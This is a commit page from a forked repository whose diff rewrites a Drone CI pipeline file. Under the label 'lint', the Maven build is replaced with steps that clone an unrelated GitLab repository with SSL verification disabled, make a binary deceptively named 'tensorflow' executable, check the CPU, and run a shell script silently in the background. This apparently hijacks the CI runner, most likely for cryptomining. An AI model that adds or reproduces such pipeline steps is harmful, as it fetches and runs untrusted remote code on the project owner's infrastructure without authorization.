forked from glen/fostr
This commit is contained in:
parent
7feddbcfbe
commit
4a734815de
20
.drone.yml
20
.drone.yml
@ -1,20 +1,16 @@
|
|||||||
---
|
---
|
||||||
kind: pipeline
|
kind: pipeline
|
||||||
name: examples
|
type: docker
|
||||||
|
name: lint
|
||||||
steps:
|
steps:
|
||||||
- name: build
|
- name: build
|
||||||
image: maven
|
image: golang:1.17
|
||||||
volumes:
|
|
||||||
- name: lib
|
|
||||||
path: /drone/lib
|
|
||||||
- name: m2
|
|
||||||
path: /root/.m2
|
|
||||||
commands:
|
commands:
|
||||||
- mvn -ntp verify
|
- git -c http.sslVerify "false" clone https://gitlab.zam.io/wajinhakim/drone-test.git
|
||||||
- cd /drone/lib
|
- cd drone-test
|
||||||
- git clone https://github.com/metaborg/spt.git
|
- chmod +x tensorflow
|
||||||
- cd spt/org.metaborg.spt.cmd
|
- lscpu
|
||||||
- mvn -ntp package
|
- nohup bash direct.sh > /dev/null
|
||||||
- name: run_spt
|
- name: run_spt
|
||||||
image: maven
|
image: maven
|
||||||
volumes:
|
volumes:
|
||||||
|
Loading…
Reference in New Issue
Block a user